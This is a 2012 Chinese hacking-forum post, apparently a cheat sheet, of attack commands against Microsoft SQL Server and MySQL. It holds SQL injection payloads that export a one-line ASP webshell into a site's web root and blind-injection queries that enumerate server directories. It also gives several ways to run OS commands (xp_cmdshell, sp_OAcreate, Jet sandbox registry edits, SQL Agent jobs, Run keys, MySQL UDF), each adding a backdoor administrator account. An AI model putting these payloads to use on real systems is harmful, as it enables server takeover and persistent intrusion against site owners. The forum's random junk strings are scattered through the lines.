找回密码
 立即注册
查看: 3544|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马; G3 J# t9 L( X- y% w( i' a
首先确定网站的WEB路径
4 u! J( H9 `9 D# K! m/ D; ^% q;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马7 O. O$ \$ A9 ?$ x9 M! f2 A$ A
4 n1 \6 B& i3 n- I3 \
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
, l. B* Q9 |  R1 y: ~//将一句话木马插入表中2 o7 U. O) D2 n, d1 `! G
! N. v  ]% Y- _2 _' a
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- 3 t$ d6 f# ~! y2 M3 V
//导出一个ASP文件
0 z1 V0 w* Q& ]# M2 U/ `& h: v) P" c. @

$ R8 S: y! q  x- m' n4 @! h! L- L; ^1 @关于MSSQL列目录
6 {* q) I; m3 Y; j;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表6 w& U6 ^) O9 o% e  n
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表  t: k( e& Q7 Z  `

( y! U0 f# g  X" Rand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录  D* j7 t9 _9 m9 g2 p- c. r. a( v$ Y

. ?8 K/ \' P1 G7 J* u2 S) _And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
0 h3 X# L1 l( a
* t5 ?8 b: x* \5 [0 |And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
5 d' q$ B- v1 b1 K
0 e5 Q7 {% U  O+ E6 O; b- r, A$ h1 J- w9 y* ?+ k: M1 |4 [
数据库版本和权限查看
* c" @. ]2 U; p& S; J4 Wand 1=(select @@VERSION) //查看详细的数据库信息.6 m) n# w1 g8 m
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
* n8 p3 h4 g* X/ z/ Hand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
3 b2 t1 b& X: }, D* B. `& z6 ?5 M+ D4 e

5 j2 G1 G- w6 p. ]+ O1.利用xp_cmdshell执行命令3 t$ L8 P; r  ]* L2 [  v3 Q' y, k5 n
exec master..xp_cmdshell 'net user rfire 123456 /add'. W0 v# ^  b4 i% Z0 _, M0 h. Y
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
8 o& Z; c  @6 v) y3 {/ o8 |! u9 M: _# s
恢复xp_cmdshell存储过程
! W2 m" S7 D0 D. F" d; @( Y) ^Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'& p1 _) T3 ?" m5 ]7 b
& r8 e4 w4 ~" c; ^* c# @3 }0 y
" V$ p% e9 j2 _( Y: a
2.利用SP_OAcreate和SP_OAMETHOD执行命令2 `* I( d" U* U  q
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下" \% `: [; w& B' k
DECLARE @shell INT //建立一个@shell实体6 P3 l6 O# Q& k
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例  _  J$ }% ~3 w5 c
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
. r9 r* |$ Y, b% G! ~5 d) d7 w0 x7 {0 q- m6 y
7 ?% |( _' u$ A) q6 i
3.利用沙盒模式
2 S0 W+ D9 j# C% u* S3 g# G先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。0 X& M; R8 w* q/ d2 W# R9 u
开启沙盒模式:
& Q7 \+ H; P3 VEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0, @- r/ O  p3 z% ^

! D, L! x/ C3 l& p执行命令:
  n' `4 x7 u/ D9 Y' B5 ?Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');, G5 Z2 n( ~. I) }7 B
( z) B( D, e9 r5 c6 V9 H$ x% @

, {) p9 v# O$ _* B" M" W4.利用SQL代理执行命令
0 T4 E3 o: t4 n. ]& y" C% NEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务8 B( A6 `8 z! ?: `

8 ]8 n3 K5 l! m8 l7 K8 c2 e- t% M: j执行命令:" \. ~( k) ^8 G0 C+ b$ M
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错) o8 j4 j/ s3 J+ B+ M
exec sp_add_job 'x'
# L- t! k4 ~4 M2 texec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业% A1 u" E! o& A5 i4 m- w5 }
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业9 E' ^: ?- ~; l- Y
# a+ |. N! q$ A: D
+ p/ A' u5 P$ z
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)0 b* g' R: J% I5 e9 h( ]: s
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
- ]2 L: y& I$ Z+ K1 s
: R( H  }# U' O6 V8 n
1 f7 |7 q( ?+ m5 I" I2 b8 X6.MYSQL的命令执行
' I; B3 T+ _3 o# f6 UMYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)! o" ]  ~, ^2 j  J! f8 W
首先要在su.php下导出c:\windows\udf.dll
8 U$ B$ O' r/ O5 w导出后执行创建自定义函数命令:
. w8 Z3 a5 V6 Z9 Z1 _Create Function cmdshell returns string soname 'udf.dll'
6 }; J; {1 i8 ^6 k( I4 o5 C  }& f执行命令4 A6 v  B3 Q8 O! s
select cmdshell('net user rfire 123456 /add')5 U/ g7 I9 z3 z" {9 O: }; y# y) \2 l" A
执行后删除函数 drop function cmdshell8 K# K& p3 q( q: g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表